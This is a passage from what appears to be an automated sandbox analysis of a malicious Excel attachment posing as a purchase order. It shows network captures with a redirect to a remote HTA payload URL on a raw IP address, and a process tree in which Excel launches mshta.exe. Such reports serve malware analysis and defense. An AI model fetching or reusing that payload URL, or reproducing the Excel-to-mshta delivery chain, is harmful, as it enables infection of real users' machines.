                                    X-XSS-Protection: 1; mode=block
                                    Location: http://198.12.89.24/xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped
                                    Vary: Accept
                                    2025-03-17 08:43:04 UTC118INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 31 32 2e 38 39 2e 32 34 2f 78 61 6d 70 70 2f 61 6e 67 65 6c 2f 63 65 73 67 72 65 61 74 6e 65 73 73 66 6f 72 65 6e 74 69 72 65 74 69 6d 65 67 6f 6f 64 67 69 72 6c 73 68 65 69 73 2e 68 74 61 3f 26 62 61 6c 69 6e 65 73 65 3d 73 74 65 72 65 6f 74 79 70 65 64
                                    Data Ascii: Found. Redirecting to http://198.12.89.24/xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.95854213.107.253.724436968C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-17 08:43:18 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                    Host: otelrules.svc.static.microsoft
                                    2025-03-17 08:43:18 UTC500INHTTP/1.1 200 OK
                                    Date: Mon, 17 Mar 2025 08:43:18 GMT
                                    Content-Type: text/plain
                                    Content-Length: 1114783
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Cache-Control: public
                                    Last-Modified: Mon, 17 Mar 2025 00:15:55 GMT
                                    ETag: "0x8DD64E8E2A782F5"
                                    x-ms-request-id: 2689232f-001e-0082-4716-975880000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250317T084318Z-r1bcb8df696ldb2chC1MNZ3pf800000002eg000000008vdn
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache-Info: L2_T2
                                    X-Cache: TCP_REMOTE_HIT
                                    Accept-Ranges: bytes
                                    2025-03-17 08:43:18 UTC15884INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                    Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                    2025-03-17 08:43:18 UTC16384INData Raw: 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43
                                    Data Ascii: S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C
                                    2025-03-17 08:43:18 UTC16384INData Raw: 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43
                                    Data Ascii: </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C
                                    2025-03-17 08:43:18 UTC16384INData Raw: 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20
                                    Data Ascii: "AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE">
                                    2025-03-17 08:43:18 UTC16384INData Raw: 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20
                                    Data Ascii: T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C>
                                    2025-03-17 08:43:18 UTC16384INData Raw: 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32
                                    Data Ascii: 1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e2
                                    2025-03-17 08:43:18 UTC16384INData Raw: 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20
                                    Data Ascii: ="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S>
                                    2025-03-17 08:43:18 UTC16384INData Raw: 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20
                                    Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R>
                                    2025-03-17 08:43:18 UTC16384INData Raw: 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70
                                    Data Ascii: </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownExcep
                                    2025-03-17 08:43:18 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c
                                    Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.95854413.107.253.724436968C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-17 08:43:24 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                    Host: otelrules.svc.static.microsoft
                                    2025-03-17 08:43:24 UTC522INHTTP/1.1 200 OK
                                    Date: Mon, 17 Mar 2025 08:43:24 GMT
                                    Content-Type: text/xml
                                    Content-Length: 2128
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Cache-Control: public, max-age=604800, immutable
                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                    ETag: "0x8DC582BA41F3C62"
                                    x-ms-request-id: 34637610-b01e-0001-0dfd-9646e2000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250317T084324Z-r1985965d79k7tbxhC1MNZe7qn000000062g0000000061v6
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache-Info: L2_T1
                                    X-Cache: TCP_REMOTE_HIT
                                    Accept-Ranges: bytes
                                    2025-03-17 08:43:24 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.95854313.107.253.724436968C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-17 08:43:24 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                    Host: otelrules.svc.static.microsoft
                                    2025-03-17 08:43:24 UTC491INHTTP/1.1 200 OK
                                    Date: Mon, 17 Mar 2025 08:43:24 GMT
                                    Content-Type: text/xml
                                    Content-Length: 204
                                    Connection: close
                                    Cache-Control: public, max-age=604800, immutable
                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                    ETag: "0x8DC582BB6C8527A"
                                    x-ms-request-id: 7f2185fb-401e-0015-4016-970e8d000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250317T084324Z-r1bcb8df696x24wphC1MNZgb0w00000005u0000000009d0k
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache-Info: L1_T2
                                    X-Cache: TCP_HIT
                                    Accept-Ranges: bytes
                                    2025-03-17 08:43:24 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                    Statistics

                                    CPU Usage

                                    050100s020406080100

                                    Click to jump to process

                                    Memory Usage

                                    050100s0.0050100150200MB

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    • File
                                    • Registry

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:04:42:08
                                    Start date:17/03/2025
                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x710000
                                    File size:53'161'064 bytes
                                    MD5 hash:4A871771235598812032C822E6F68F19
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    Show Windows behavior

                                    System Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:10
                                    Start time:04:43:03
                                    Start date:17/03/2025
                                    Path:C:\Windows\SysWOW64\mshta.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                    Imagebase:0x1e0000
                                    File size:13'312 bytes
                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:12
                                    Start time:04:43:12
                                    Start date:17/03/2025
                                    Path:C:\Windows\splwow64.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\splwow64.exe 12288
                                    Imagebase:0x7ff61b330000
                                    File size:163'840 bytes
                                    MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:14
                                    Start time:04:43:22
                                    Start date:17/03/2025
                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx"
                                    Imagebase:0x710000
                                    File size:53'161'064 bytes
                                    MD5 hash:4A871771235598812032C822E6F68F19
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    Show Windows behavior

                                    System Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Disassembly

                                    No disassembly